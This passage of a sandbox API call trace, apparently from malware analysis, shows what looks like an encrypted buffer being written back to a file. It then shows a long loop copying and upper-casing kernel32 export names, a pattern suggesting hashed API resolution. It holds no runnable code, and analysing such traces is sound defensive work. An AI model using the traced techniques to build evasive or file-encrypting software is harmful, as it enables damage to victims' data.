hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.094] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.094] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.094] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.094] CloseHandle (hObject=0x464) returned 1 [0079.095] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.095] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.098] CloseHandle (hObject=0x0) returned 0 [0079.098] CloseHandle (hObject=0x460) returned 1 [0079.099] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.099] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.099] GetTickCount () returned 0x114c449 [0079.099] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.099] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.099] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.100] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.100] lstrlenA (lpString="kernel32.dll") returned 12 [0079.100] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.100] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.100] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.100] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.100] lstrlenA (lpString="ADDATOMA") returned 8 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.100] lstrlenA (lpString="ADDATOMW") returned 8 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.100] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.100] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.100] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.100] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.101] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.101] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.101] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.101] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.101] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.101] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.101] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.101] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.101] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.101] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.101] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.101] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.101] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.101] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.101] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.101] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.101] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.101] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.101] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.102] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.102] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.102] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.102] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.102] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.102] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.102] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.102] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.102] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.102] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.102] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.102] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.102] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.102] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.102] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.102] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.102] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.102] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.102] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.103] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.103] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.103] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.103] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.103] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.103] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.103] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.103] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.103] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.103] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.103] lstrlenA (lpString="BEEP") returned 4 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.103] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.103] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.103] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.103] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.103] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.103] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.103] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.103] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.103] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.104] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.104] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.104] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.104] lstrlenA (lpString="CANCELIO") returned 8 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.104] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.104] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.104] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.104] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.104] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.104] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.104] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.104] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.104] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.104] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.104] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.104] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.104] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.105] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.105] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.105] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.105] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.105] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.105] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.105] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.105] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.105] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.105] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.105] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.105] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.105] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.105] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.105] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.105] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.105] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.105] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.105] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.106] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.106] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.106] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.106] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.106] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.106] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.106] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.106] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.106] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.106] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.106] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.106] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.106] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.106] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.106] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.106] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.106] 